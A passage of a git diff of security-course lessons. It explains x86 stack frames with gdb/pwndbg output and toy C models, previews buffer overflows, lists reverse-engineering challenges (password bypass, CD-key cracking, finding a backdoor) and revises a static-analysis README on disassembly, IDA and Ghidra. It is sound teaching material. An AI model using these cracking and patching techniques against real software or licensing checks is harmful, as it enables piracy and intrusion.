'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 + 
+[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080491d0 in main () +pwndbg> disass password_accepted + + + 0x080491b2 <+0>: push ebp + 0x080491b3 <+1>: mov ebp,esp + 0x080491b5 <+3>: push 0x0 + 0x080491b7 <+5>: push 0x0 + 0x080491b9 <+7>: push 0x804a008 + 0x080491be <+12>: call 0x8049070 + 0x080491c3 <+17>: add esp,0xc + 0x080491c6 <+20>: nop + 0x080491c7 <+21>: leave + 0x080491c8 <+22>: ret + +``` + +What we did is we created a breakpoint for the start of the main function and then ran the program. +As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. + +We then set a breakpoint for another function called `pass_accepted`, continued execution and entered a password that we know is going to pass validation. +Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. + +The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. + +In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container(`mov ebp,esp`). + +For a visual explanation please see below: + +

+ Sublime's custom image +

+ +As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame. +That is why it is most often referred to as the frame pointer. + +In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function + +If you analyze the instructions at the beginning of main, you can spot these as being: + +- An `and esp,0xfffffff0` instruction. + +- A `sub` insctruction that subtracts a hex value from ESP. + +The first of the two instructions has the purpose of aligning the stack to a specific address boundary. +This is done to increase processor efficiency. +In our specific case, the top of the stack gets aligned to a 16 byte multiple address. + +One of the purposes of the stack inside functions is that of offering address space in which to place local variables. +The second instruction preallocates space for local function variables. + +Let's see how local variables are handled inside assembly code. + +```c +#include +int main() +{ + int a; + a=1; + return 0; +} +``` + +```text +kali@kali:~/sss$ gdb test +GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 +Copyright (C) 2012 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "i686-linux-gnu". +For bug reporting instructions, please see: +... +Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. 
+pwndbg> break main +Breakpoint 1 at 0x80483ba +pwndbg> run +[----------------------------------registers-----------------------------------] +EAX: 0x1 +EBX: 0xb7fc6ff4 --> 0x1a0d7c +ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c +ESI: 0x0 +EDI: 0x0 +EBP: 0xbffff378 --> 0x0 +ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) +EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x80483b4
:, push ebp + 0x80483b5 :,mov ebp,esp + 0x80483b7 :,sub esp,0x10 +=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 + 0x80483c1 :,mov eax,0x0 + 0x80483c6 :,leave + 0x80483c7 :,ret + 0x80483c8:,nop +[------------------------------------stack-------------------------------------] +0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c +0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) +0012| 0xbffff374 --> 0x0 +0016| 0xbffff378 --> 0x0 +0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) +0024| 0xbffff380 --> 0x1 +0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080483ba in main () +``` + +As you can see, the operations that relate to the stack are: + +- The old frame pointer is saved. +- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame). +- `0x10` is subtracted from ESP (reserve space for local variables). +- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1). + +### Function Parameters + +The stack is also used to pass in parameters to functions. + +In the process of calling a function we can define two entities: +the callee (the function that gets called) and the caller (the function that calls). + +When a function is called, the caller pushes the parameters for the callee on the stack. +The parameters are pushed in reverse order. + +When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that lies at higher addresses than the start of its frame. + +At this point it makes sense to remember the following cases: + +- When EBP+value is referred to, it is generally a reference to a parameter passed in to the current function. 
+- When EBP-value is referred to, it is generally a reference to a local variable. + +Let's see how this happens with the following code: + +```c +#include + +int add(int a, int b) +{ + int c; + c=a+b; + return c; +} + +int main() +{ + add(10,3); + return 0; +} +``` + +```text +pwndbg> pdis 0x080483ca +Dump of assembler code for function main: + 0x080483ca <+0>:,push ebp #save the old frame pointer + 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer + 0x080483cd <+3>:,sub esp,0x8 #create space for the outgoing parameters + 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #place the last parameter of the function that is to be called + 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #place the second to last (the first in this case) parameter of the function that is to be called + 0x080483df <+21>:,call 0x80483b4 #call the function + 0x080483e4 <+26>:,mov eax,0x0 + 0x080483e9 <+31>:,leave + 0x080483ea <+32>:,ret +End of assembler dump. +pwndbg> pdis 0x080483b4 +Dump of assembler code for function add: + 0x080483b4 <+0>:,push ebp #save the old frame pointer + 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer + 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables + 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the second parameter (b) into the EAX register (ebp+saved_ebp(4 bytes)+return_address(4 bytes)+first_parameter(4 bytes)) + 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the first parameter (a) into the EDX register (ebp+saved_ebp(4 bytes)+return_address(4 bytes)) + 0x080483c0 <+12>:,add eax,edx #add the registers + 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) + 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it + 0x080483c8 <+20>:,leave + 0x080483c9 <+21>:,ret +End of assembler dump. +``` + +As you can see, the parameters were placed on the stack in reverse order, and the rule regarding the reference to EBP holds. 
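The EBP-relative offsets seen in `add` can be reproduced with a small simulation.
The following is only a sketch of a 32-bit stack, not real machine behaviour: the `toy_*` names and the 64-byte stack size are assumptions made for illustration, while the return address `0x080483e4` is the one from the disassembly of `main` above.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_STACK_BYTES 64u

/* Toy model of a 32-bit stack. All names here are hypothetical. */
typedef struct {
    uint32_t words[TOY_STACK_BYTES / 4];
    uint32_t esp; /* byte offset of the top of the stack */
    uint32_t ebp; /* byte offset of the current frame base */
} toy_stack;

void toy_push(toy_stack *s, uint32_t value)
{
    assert(s->esp >= 4);
    s->esp -= 4; /* the stack grows towards lower addresses */
    s->words[s->esp / 4] = value;
}

uint32_t toy_read(const toy_stack *s, uint32_t addr)
{
    assert(addr % 4 == 0 && addr < TOY_STACK_BYTES);
    return s->words[addr / 4];
}

/* Models the caller invoking add(a, b), followed by the callee's prologue. */
void toy_enter_add(toy_stack *s, uint32_t a, uint32_t b)
{
    s->esp = TOY_STACK_BYTES; /* empty stack */
    s->ebp = TOY_STACK_BYTES; /* dummy value standing in for the caller's EBP */

    toy_push(s, b);           /* caller: the last parameter goes first */
    toy_push(s, a);           /* caller: the first parameter goes last */
    toy_push(s, 0x080483e4u); /* call: return address */
    toy_push(s, s->ebp);      /* callee: push ebp */
    s->ebp = s->esp;          /* callee: mov ebp, esp */
}

/* Models the body of add(): parameters are read relative to EBP. */
uint32_t toy_add(const toy_stack *s)
{
    uint32_t a = toy_read(s, s->ebp + 0x8); /* first parameter */
    uint32_t b = toy_read(s, s->ebp + 0xc); /* second parameter */
    return a + b;
}
```

In this model `[ebp]` holds the saved frame pointer and `[ebp+0x4]` the return address, which is why the first parameter only shows up at `[ebp+0x8]`.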
+ +If you don't understand why the offset for the parameters starts at EBP+0x08 and not at EBP, follow through with the next section. + +### Calling functions (call and ret) + +When calling a function, the caller places the return address on the stack (this is done by the `call` instruction itself). +This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution. + +The last instruction in functions is usually a `ret` instruction that returns execution to the caller. + +For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. + +The call instruction could be translated to the following instructions: + +- `push eip` (at this point EIP already holds the address of the instruction that follows the `call`) +- `mov eip, address_of_called_function` + +The ret instruction could be translated into `pop eip`. + +The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well: + +

+ +

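The `push eip` / `pop eip` view of `call` and `ret` can also be written down as a tiny model.
This is a minimal sketch under stated assumptions: `toy_cpu`, `toy_call` and `toy_ret` are hypothetical names, and the length of the `call` instruction is passed in explicitly because the model does not decode instructions.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_DEPTH 16

/* Toy CPU state: an instruction pointer and a small stack of return addresses. */
typedef struct {
    uint32_t stack[TOY_DEPTH];
    int depth;    /* number of words currently on the stack */
    uint32_t eip; /* address of the instruction being executed */
} toy_cpu;

/* call target: push the address of the next instruction, then jump. */
void toy_call(toy_cpu *cpu, uint32_t target, uint32_t call_len)
{
    assert(cpu->depth < TOY_DEPTH);
    cpu->stack[cpu->depth++] = cpu->eip + call_len; /* push eip */
    cpu->eip = target;                              /* mov eip, target */
}

/* ret: pop the saved address back into the instruction pointer. */
void toy_ret(toy_cpu *cpu)
{
    assert(cpu->depth > 0);
    cpu->eip = cpu->stack[--cpu->depth];            /* pop eip */
}
```

With the addresses from the earlier listing, a 5-byte `call` located at `0x080483df` that targets `0x080483b4` saves `0x080483e4`, which is exactly where `main` continues once `add` returns.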
+ +### Next Section Preview: Buffer Overflows + +Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. + +A buffer overflow takes place when a write to a buffer is not checked against the buffer's boundaries, and it often results in control of the program's instruction pointer. +This happens when the data written past the end of the buffer overwrites the return address of a function. + +A typical example of buffer overflows can be seen in the following picture: + +

+ +

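To make the idea concrete without relying on undefined behaviour, the frame can be modelled as a plain byte array.
The sketch below is an assumption-laden illustration, not an exploit: the layout (an 8-byte buffer followed by the saved EBP and the return address) and all `toy_*` names are made up, and real layouts depend on the compiler and its flags.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { TOY_BUF_SIZE = 8, TOY_FRAME_SIZE = TOY_BUF_SIZE + 4 + 4 };

/* Modelled frame: [buffer (8 bytes)][saved EBP (4 bytes)][return address (4 bytes)] */
typedef struct {
    uint8_t bytes[TOY_FRAME_SIZE];
} toy_frame;

void toy_frame_init(toy_frame *f, uint32_t saved_ebp, uint32_t ret_addr)
{
    memset(f->bytes, 0, TOY_BUF_SIZE);
    memcpy(f->bytes + TOY_BUF_SIZE, &saved_ebp, 4);
    memcpy(f->bytes + TOY_BUF_SIZE + 4, &ret_addr, 4);
}

uint32_t toy_frame_ret(const toy_frame *f)
{
    uint32_t ret;
    memcpy(&ret, f->bytes + TOY_BUF_SIZE + 4, 4);
    return ret;
}

/* Copies into the buffer WITHOUT checking len against TOY_BUF_SIZE.
 * The assert only keeps the model itself inside its own array. */
void toy_unchecked_copy(toy_frame *f, const uint8_t *input, size_t len)
{
    assert(len <= TOY_FRAME_SIZE);
    memcpy(f->bytes, input, len);
}
```

Copying 8 bytes leaves the modelled return address untouched, while copying 16 bytes of `'A'` turns it into `0x41414141`, the value that typically shows up in EIP when a real overflow of this kind is triggered.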
+ + +## Challenges + +Use GDB and pwndbg to run the code provided in the Activities section. + +### 01. Challenge - Explore The Simple Password Protected Bash + +The executable gets input from the user and evaluates it against a static condition. +If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. + +Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. + +Gather as much info about the executable as possible through the techniques you have learned in previous sessions. + +Think of modifying registers to force the executable to call the function (there is more than one way of doing this). + +### 02. Challenge - Simple Password Protected Bash Destruction + +What is the condition against which your input is evaluated in the `sppb` executable? + +The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes). + +### 03. Challenge - Domino + +Analyze the binary, reverse engineer what it does and get a nice message +back. + +### 04. Challenge - Call me + +Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag. + +Hint: There is something hidden you can toy around with. + +Hint: The challenge name is a hint. + +### 05. Challenge - Snooze Me + +I wrote a simple binary that computes the answer to life, the universe and everything. +I swear it works... eventually. + +### 06. Challenge - Phone Home + +To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. + +Unfortunately, the key feature of the application is now unreachable due to a bug. +Can you bypass the impossible condition? + +### 07. 
Challenge - Chain encoder + +How do you reverse something made to be irreversible? You are welcome to find out in this challenge. + +### 08. Challenge - Simple cdkey + +I found this software but I don't have the CD key. Can you crack it for me? diff --git a/chapters/binary-analysis/static-analysis/reading/README.md b/chapters/binary-analysis/static-analysis/reading/README.md index 98c413e..c9fe0ba 100644 --- a/chapters/binary-analysis/static-analysis/reading/README.md +++ b/chapters/binary-analysis/static-analysis/reading/README.md @@ -1,377 +1,377 @@ -# Static Analysis - -## Table of Contents - -- [Introduction](#introduction) -- [Disassembling executables](#disassembling-executables) - - [Linear Sweep](#linear-sweep) - - [Recursive Traversal](#recursive-traversal) -- [IDA and Ghidra](#ida-and-ghidra) - - [IDA tips & tricks](#ida-tips--tricks) - - [IDA Pro and Ghidra](#ida-pro-and-ghidra) -- [C++](#c) -- [Further reading](#further-reading) -- [Challenges](#challenges) - - [04. crypto_crackme](#04-crypto_crackme) - - [05. broken](#05-broken) - - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) - -## Introduction - -Sometimes we are either unable or reluctant to run an unknown executable. -This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. -In addition, it is often unsafe to run binaries without analysing them first. -Today we'll learn about one method of analysis, called **static analysis**. - -Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. -In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. 
-The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. - -## Disassembling Executables - -There are two main strategies when it comes to disassembly. -They are called **Linear Sweep** and **Recursive Traversal**. -As we'll see below, the main difference between the two is their accuracy - -### Linear Sweep - -The first strategy that we'll look at is _Linear Sweep_. -A very popular tool that uses this strategy is `objdump`. -What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. -It's a fast and simple algorithm. -Being so simple, however, renders it vulnerable to being mislead. -This can happen in a few ways. -One way is to insert an inappropriate instruction somewhere in the `.text` section. -When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. - -Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): - -```c -int main() -{ - asm volatile( - "A: jmp B\n\t" - ".byte 0xde\n\t" - ".byte 0xad\n\t" - ".byte 0xc0\n\t" - ".byte 0xde\n\t" - "jmp -1\n\t" - "B:\n\t" - ); - printf("What is wrong with me :-s?\n"); - return -1; -} -``` - -Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: - -```makefile -wrong: wrong.o - $(CC) $(CFLAGS) $< -o $@ - -strip $@ -``` - -If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. 
-The binary code is as expected, but the way it's interpreted is completely off. -This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that that code is meaningless. - -```asm -080491ab : - 80491ab: eb 09 jmp 80491b6 - 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] - 80491b3: 6e outs dx,BYTE PTR ds:[esi] - 80491b4: fb sti - 80491b5: f7 .byte 0xf7 - -080491b6 : - 80491b6: 83 ec 0c sub esp,0xc -``` - -If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. -This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. -Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. - -```asm - 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> - 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] - 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> - 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 - 804841d: 04 08 e8 - 8048420: ac lods al,BYTE PTR ds:[esi] - 8048421: fe (bad) - 8048422: ff (bad) - 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] - 8048429: ff (bad) - 804842a: ff (bad) - 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] - 8048431: 61 popa - 8048432: fc cld - 8048433: c3 ret -``` - -In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. - -### Recursive Traversal - -Note that, in the example above, the misleading instruction is never executed. -If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. -But if we run the binary above, we notice that it doesn't crash. 
-So that instruction is nothing but dead code. -As a result, it's useless to us no matter what it means. -And this is where _Recursive Traversal_ comes in. - -This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. -Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. -Take a look at the CFG below and note the BBs and the jumps that make up the arches. -The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). -To make things harder, this executable was also stripped. -![CFG created by IDA](../media/fork_xref_2.png) - -In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. - -## IDA and Ghidra - -The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). -Next, we'll learn how to use it! - -We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. -The first screen you are presented with is the following: - -![Initial IDA Screen](../media/ida_initial_screen.png) - -Main components: - -- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. -They are color coded according to the legend right above it. -- Under it you have a graph overview of the view presented on the right. 
-- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. -We will not be using this. -Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. -This graph is the CFG we mentioned earlier. - -Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: -![IDA - First View](../media/ida_first_view.png) - -When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. -Remember from [the "Executables an Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. -We now rename the last argument pushed on the stack to main. -Press `n` and enter the new name. -Now you have your first function identified. -Click on it to see what `main` does: - -![main](../media/ida_main.png) - -Note how the execution is neatly layed out in the CFG view. -If you look at the left panel you can see the complete view. -The execution is divided because of conditional and unconditional branches. -Let's figure out what happens by analyzing the assembly code: - -First we have the function prologue, stack alignment and stack allocation: - -```asm -push ebp -mov ebp, esp -and esp, 0FFFFFFF0h -sub esp, 450h -``` - -Next, a variable on the stack is initialized to 1. -If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. -We'll ignore this for now. 
- -```asm -mov dword ptr [esp+434h], 1 -``` - -Next, we see the first branching: - -``` -cmp [ebp+arg_0], 2 -jz short loc_8049068 -``` - -**Remember!** On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. -IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. -You can rename those `arg_*` constructs if you want, anyway. - -So it's referring to the first argument: `argc`. -Basically, what it does is: - -```c -if(argc == 2) { - goto loc_8049068 -} else { -.... -} -``` - -What does the `else` branch do? - -```asm -mov eax, [ebp+arg_4] -mov eax, [eax] -mov [esp+4], eax -mov dword ptr [esp], offset format ; "Usage: %s \n" -call _printf - -mov dword ptr [esp], 0 ; status -call _exit -``` - -It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). -The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. -Then `printf` is called. -Next, `exit` is called with a status of 0. - -```c -if(argc == 2) { - goto loc_8049068 -} else { - printf("%s \n", argv[0]); - exit(0); -} -``` - -Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. -How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. -It can do this through forking. -Let's see where `fork` is called in the program. -First find the `fork` function on the left panel and select it. -Now you see a stub to it from the `PLT` section. -We want to find all locations in the program that call this function. -You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. 
-You should get the following screen: - -![fork cross-references 1](../media/fork_xref_1.png) - -Click that location and you will get to the forking point: - -![fork cross-references 2](../media/fork_xref_2.png) - -You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). -The child will execute `sub_8048ED7` and the parent will loop back. -You can rename `sub_8048ED7` to something more legible such as `handle_child_process` -In this function you can now clearly see the two commands and which function is called for each: - -![handle_child_process](../media/handle_child_process.png) - -It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. -As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. - -![handle_LIST](../media/handle_LIST.png) - -### IDA tips & tricks - -- Saving progress is disabled for the trial version. - However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. -- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. -- If you want to return to the previous view you can press `Escape`. -- When you want to view code as in `objdump` you only need to press `Spacebar` once. - And then again to return to CFG mode. -- If there is a hex value and you want to convert it to decimal (or back) press `h`. -- Converting hex/dec values to _ASCII_: press `r`. -- If you want to write comments next to an instruction or a function press `:`. - -### IDA Pro and Ghidra - -IDA Pro is installed on the Kali virtual machine. 
-The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. -This will come in extremely useful as we hack more and more binaries. - -Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). -One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. -This allows us to correlate the two and reap the benefits of both of them at the same time. - -## C++ - -Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. -The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. -Let's disassemble the code below and see how its symbols look: - -```code c -##include -using namespace std; -int main() -{ - cout << "Hello world" << endl; - return 0; -} -``` - -Disassembling it in IDA looks familiar at first - -![IDA start](../media/ida_c%2B%2B_start.png) - -But then the fun starts: - -![IDA main](../media/ida_c%2B%2B_main.png) - -As we can see, all symbols look almost as if they were encrypted. -In fact, this process is called **name mangling**. -If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. -The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. - -IDA can demangle strings such as the ones above by itself. 
-Some recommended settings (you may prefer something different) are the following: - -- `Options -> Demangled names` -- Show demangled C++ names as `Names` -- `Setup short names` -- Click `Only main name` - -These settings only display the important classes and namespaces that make up each method, like this: - -![IDA demangled](../media/ida_c%2B%2B_demangled.png) - -## Further reading - -More information about name mangling can be obtained at: - -- https://en.wikipedia.org/wiki/Name_mangling -- on demand demangling: http://demangler.com/ or c++filt - -You can find out more information about the internals of C++ in general, using the following references: - -- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) -- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf -- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf - -## Challenges - -### 04. crypto_crackme - -The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. -In order to solve this task, you have to retrieve the message. - -- Open the binary using IDA and determine the program control flow. - What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. - If possible, use IDA to patch the program and reduce the execution time of the application. - Use `Edit -> Patch program -> Change byte...` -- Next, it looks like the program tries to verify if the secret provided is correct. - Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. -- Now break it and retrieve the message! - -**Important!**: Unfortunately, the virtual machine doesn't support the libssl1.0.0 version of SSL library. -Use the library files in the task archive and run the executable using: - -```console -LD_LIBRARY_PATH=. ./crypto_crackme -``` - -You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). - -### 05. 
broken - -The `broken` binary is asking you for the correct password. -Investigate the binary and provide it with the correct password. -If you provided the correct password the message `That's correct! The password is '...'`. - -### 06. hyp3rs3rv3r - -Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. -Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. -Figure out a way around this. -When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. - -**Hint**: In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. -You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). +# Static Analysis + +## Table of Contents + +- [Introduction](#introduction) +- [Disassembling executables](#disassembling-executables) + - [Linear Sweep](#linear-sweep) + - [Recursive Traversal](#recursive-traversal) +- [IDA and Ghidra](#ida-and-ghidra) + - [IDA tips & tricks](#ida-tips--tricks) + - [IDA Pro and Ghidra](#ida-pro-and-ghidra) +- [C++](#c) +- [Further reading](#further-reading) +- [Challenges](#challenges) + - [04. crypto_crackme](#04-crypto_crackme) + - [05. broken](#05-broken) + - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) + +## Introduction + +Sometimes we are either unable or reluctant to run an unknown executable. +This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. +In addition, it is often unsafe to run binaries without analysing them first. +Today we'll learn about one method of analysis, called **static analysis**. + +Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. 
+There are currently two approaches for obtaining the assembly code, via a procedure called **disassembling**, and we'll describe them in the following sections. +The high-level code is _deduced_ from the machine code through a more complex process called **decompilation**, which can make it somewhat inaccurate when compared to the assembly code. + +## Disassembling Executables + +There are two main strategies when it comes to disassembly. +They are called **Linear Sweep** and **Recursive Traversal**. +As we'll see below, the main difference between the two is their accuracy. + +### Linear Sweep + +The first strategy that we'll look at is _Linear Sweep_. +A very popular tool that uses this strategy is `objdump`. +_Linear Sweep_ parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. +It's a fast and simple algorithm. +Being so simple, however, makes it vulnerable to being misled. +This can happen in a few ways. +One way is to insert an inappropriate instruction somewhere in the `.text` section. +When the algorithm reaches it, it will try to interpret it as something meaningful and output completely different Assembly code that makes no sense. 
+ +Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): + +```c +#include <stdio.h> + +int main() +{ + asm volatile( + "A: jmp B\n\t" + ".byte 0xde\n\t" + ".byte 0xad\n\t" + ".byte 0xc0\n\t" + ".byte 0xde\n\t" + "jmp -1\n\t" + "B:\n\t" + ); + printf("What is wrong with me :-s?\n"); + return -1; +} +``` + +Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: + +```makefile +wrong: wrong.o + $(CC) $(CFLAGS) $< -o $@ + -strip $@ +``` + +If we remove the line at the end of the snippet above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. +The binary code is as expected, but the way it's interpreted is completely off. +This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that this code is meaningless. + +```asm +080491ab : + 80491ab: eb 09 jmp 80491b6 + 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] + 80491b3: 6e outs dx,BYTE PTR ds:[esi] + 80491b4: fb sti + 80491b5: f7 .byte 0xf7 + +080491b6 : + 80491b6: 83 ec 0c sub esp,0xc +``` + +If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. +This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. +Now, without the help of those symbols, `objdump` doesn't manage to output coherent Assembly code. 
